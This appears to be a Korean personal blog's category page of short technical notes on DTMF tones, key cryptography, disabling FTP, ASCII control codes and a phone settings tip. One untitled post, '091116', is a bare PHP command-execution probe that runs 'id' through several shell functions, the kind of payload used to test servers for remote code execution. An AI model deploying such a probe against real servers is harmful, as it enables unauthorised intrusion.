0x07 기타
- [배너] ASCII Generator 2017.06.08
- 091116 2009.11.16
- [로봇] 구글의 로봇 설정 내역 2009.10.06
- [Code] Meta Character Set 2009.08.27
- [VoIP Info] DTMF 란? 2009.08.08
- [알고리즘] 공개키 시스템과 비밀키 시스템의 차이 2009.08.08
- [시스템보안] FTP 서비스 종료 2009.08.03
- [ASCII] 특수문자 셋 정의 2009.06.29
- ASCII 코드표 2009.06.22
- [팁] EVRC & 13K 2009.06.02
[배너] ASCII Generator
091116
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
[로봇] 구글의 로봇 설정 내역
[로봇] 구글의 로봇 설정 내역
http://www.google.co.kr/robots.txt
[Code] Meta Character Set
[Code] Meta Character Set
< 는 < 로
> 는 > 로
( 는 ( 로
) 는 ) 로
# 는 # 로
& 는 & 로
[VoIP Info] DTMF 란?
Dual Tone Multi-Frequency
전화기를 들고 번호판을 누를때 들리는 음을 말함
전화기가 이 DTMF를 내보냄으로써 원하는 전화번호에 접속이 가능한 것임
또한 DTMF를 이용하여 전화선을 통해 원격지의 장치를 On/Off 하는 등 원격제어도 가능함
DTMF 주파수 조합표
|
1209Hz |
1336Hz |
1477Hz |
1633Hz |
697Hz |
1 |
2 |
3 |
A |
770Hz |
4 |
5 |
6 |
B |
852Hz |
7 |
8 |
9 |
C |
941Hz |
* |
0 |
# |
D |
[알고리즘] 공개키 시스템과 비밀키 시스템의 차이
학부시절 졸면서 흘려 배웠던 키 알고리즘이 아니라 다를까 아직도 종종 일을 하면서 괴롭힙니다. -_-
공개키 시스템과 비밀키 시스템의 장단점을 비교해봅니다.
# 공개키 알고리즘
장점 :
1. 사용자가 증가해도 관리해야할 키의 개수가 증가하지 않는다.
2. 개인키만 비밀로 보관하면 된다.
단점 :
1. 암/복호화 속도가 비밀키 시스템에 비해서 느리다.
2. 키의 크기가 비밀키 시스템에 비해서 상대적으로 크다.
# 비밀키 알고리즘
장점 :
1. 암/복호화 속도가 빠르다.
2. 키의 길이가 상대적으로 짧다.
단점 :
1. 서로 키를 비밀로 보관해야 한다.
2. 사용자가 증가할수록 관리해야할 키의 개수가 많아진다.
[시스템보안] FTP 서비스 종료
다른 용도로 사용하게 되었다.
현재 제공되고 있는 ftp서비스를 중지시키고
앞으로도 부팅시에도 더이상 제공되지 않도록 필요한 시스템 설정을 바꾸시오.
ans)
1. 부팅 시 ftp 서비스 중지 : /etc/inetd.conf 에서 ftp 주석처리
#ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd
2. 서비스 확인 : #grep ftp /etc/services
#ftp-data 20/tcp
#ftp 21/tcp
3. 현재 서비스되는 ftp 서비스 중지 : /usr/bin/inetd stop
[ASCII] 특수문자 셋 정의
[ASCII] 특수문자 셋 정의
ISO-8859-1에 정의된 아스키코드의 특수문자 셋 정의
NUL (null)
SOH (start of heading)
STX (start of text)
ETX (end of text)
EOT (end of transmission) - Not the same as ETB
ENQ (enquiry)
ACK (acknowledge)
BEL (bell) - Caused teletype machines to ring a bell. Causes a beep in many common terminals and terminal emulation programs.
BS (backspace) - Moves the cursor (or print head) move backwards (left) one space.
HT (horizontal tab) - Moves the cursor (or print head) right to the next tab stop.
The spacing of tab stops is dependent on the output device, but is often either 8 or 10.
LF (NL line feed, new line) - Moves the cursor (or print head) to a new line.
On Unix systems, moves to a new line AND all the way to the left.
VT (vertical tab)
FF (form feed) - Advances paper to the top of the next page (if the output device is a printer).
CR (carriage return) - Moves the cursor all the way to the left, but does not advance to the next line.
SO (shift out) - Switches output device to alternate character set.
SI (shift in) - Switches output device back to default character set.
DLE (data link escape)
DC1 (device control 1)
DC2 (device control 2)
DC3 (device control 3)
DC4 (device control 4)
NAK (negative acknowledge)
SYN (synchronous idle)
ETB (end of transmission block) - Not the same as EOT
CAN (cancel)
EM (end of medium)
SUB (substitute)
ESC (escape)
FS (file separator)
GS (group separator)
RS (record separator)
US (unit separator)
---------------------------------------------------------------------------------------------------------------
00 000 NUL (문자열의 끝: Null char)
01 001 SOH (Start of Heading)
02 002 STX (Start of Text)
03 003 ETX (End of Text)
04 004 EOT (End of Transmission)
05 005 ENQ (Enquiry)
06 006 ACK (Acknowledgment)
07 007 BEL (비프음: Bell)
08 008 BS (백스페이스: Backspace)
09 009 HT (탭: Horizontal Tab)
0A 010 LF (줄바꿈: NL Line Feed/New Line)
0B 011 VT (Vertical Tab)
0C 012 FF (프린터 용지 먹임: Form Feed/New Page)
0D 013 CR (줄바꿈: Carriage Return)
0E 014 SO (Shift Out)
0F 015 SI (Shift In)
10 016 DLE (Data Link Escape)
11 017 DC1 (Device Control 1)
12 018 DC2 (Device Control 2)
13 019 DC3 (Device Control 3)
14 020 DC4 (Device Control 4)
15 021 NAK (Negative Acknowledge)
16 022 SYN (Synchronous Idle)
17 023 ETB (End of Transmission Block)
18 024 CAN (Cancel)
19 025 EM (End of Medium)
1A 026 SUB (Substitute / End of File; EOF)
1B 027 ESC (Esc키: Escape)
1C 028 FS (File Separator)
1D 029 GS (Group Separator)
1E 030 RS (Request to Send / Record Separator)
1F 031 US (Unit Separator)
ASCII 코드표
[팁] EVRC & 13K
휴대폰에 319712358 를 입력한 후 비밀번호는 0821로...
음질이 좋아진다고 하는데요...
Voice SO 13K로 설정